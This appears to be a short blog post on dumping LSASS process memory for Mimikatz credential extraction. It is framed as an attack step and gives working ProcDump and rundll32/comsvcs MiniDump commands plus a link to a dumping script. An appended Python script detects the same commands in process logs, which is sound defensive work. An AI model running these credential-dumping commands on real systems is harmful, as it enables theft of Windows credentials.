相伴江湖 -- Be With You

Tuesday, April 14, 2020

LSASS Dumping Methods (For Mimikatz)


In every attack we need to get the Windows credentials; this is a super important task. The target is the "LSASS.EXE" process: its memory is dumped so that credentials can be extracted from the dump using Mimikatz.


Here are some of the important methods:

Using ProcDump:

1. The favorite method of dumping is "procdump.exe". This tool is from Microsoft PsTools.
2. Download ProcDump.exe and upload it to the remote system.
3. Command: "procdump -ma lsass.exe lsass.dmp"


Using VB Script:

Download the script from here:
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command:

Essentially, the VBS script from the previous method uses the following command to dump the Lsass.exe process:

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So even if you do not have the VB script with you, you can still run the command directly and dump the LSASS process.
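From the defender's side, both commands above leave recognizable process-creation command lines. The following is an added example, not part of the original post: it flags the two command forms shown here in process-creation records and pulls out the dump file path for follow-up. The function names, host names, log records and the PIDs 640 and 4120 are constructed assumptions.

```python
import re

# rundll32 + comsvcs.dll, MiniDump <pid> <outfile> full (the form shown in the post)
COMSVCS_RE = re.compile(
    r'\brundll32(?:\.exe)?"?\s+\S*comsvcs\.dll"?\s*,\s*MiniDump\s+'
    r'(?P<pid>\d+)\s+(?P<out>\S+)\s+full', re.I)
# procdump followed by its argument string
PROCDUMP_RE = re.compile(r'\bprocdump(?:64)?(?:\.exe)?"?\s+(?P<args>.+)', re.I)

def classify(cmdline):
    """Return a finding dict if cmdline matches either dumping method, else None."""
    m = COMSVCS_RE.search(cmdline)
    if m:
        return {"method": "comsvcs-minidump", "target": int(m["pid"]),
                "dump_path": m["out"]}
    m = PROCDUMP_RE.search(cmdline)
    if m:
        args = m["args"].split()
        flags = {a[1:].lower() for a in args if a[0] in "-/"}
        rest = [a for a in args if a[0] not in "-/"]
        # -ma = full memory dump; first positional argument is the target process
        if "ma" in flags and rest and "lsass" in rest[0].lower():
            return {"method": "procdump-full", "target": rest[0],
                    "dump_path": rest[1] if len(rest) > 1 else None}
    return None

def scan(events, lsass_pids):
    """events: (host, cmdline) pairs; lsass_pids: host -> known lsass.exe PID."""
    findings = []
    for host, cmdline in events:
        f = classify(cmdline)
        if f:
            # comsvcs takes a PID, so confirm it against the host's lsass.exe PID
            f["hits_lsass"] = (f["method"] == "procdump-full"
                               or f["target"] == lsass_pids.get(host))
            findings.append({"host": host, **f})
    return findings

# Constructed sample process-creation records (host, command line).
SAMPLE = [
    ("ws01", r"procdump -ma lsass.exe lsass.dmp"),
    ("ws02", r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full"),
    ("ws03", r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4120 C:\Temp\app.dmp full"),
    ("ws04", r"procdump -ma notepad.exe notepad.dmp"),
]
LSASS_PIDS = {"ws02": 992, "ws03": 640}  # constructed values

if __name__ == "__main__":
    print(*scan(SAMPLE, LSASS_PIDS), sep="\n")
```

The reported `dump_path` is the file to locate and secure during response; a comsvcs finding with `hits_lsass` set to False still deserves review, since the PID could not be confirmed as lsass.exe.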


















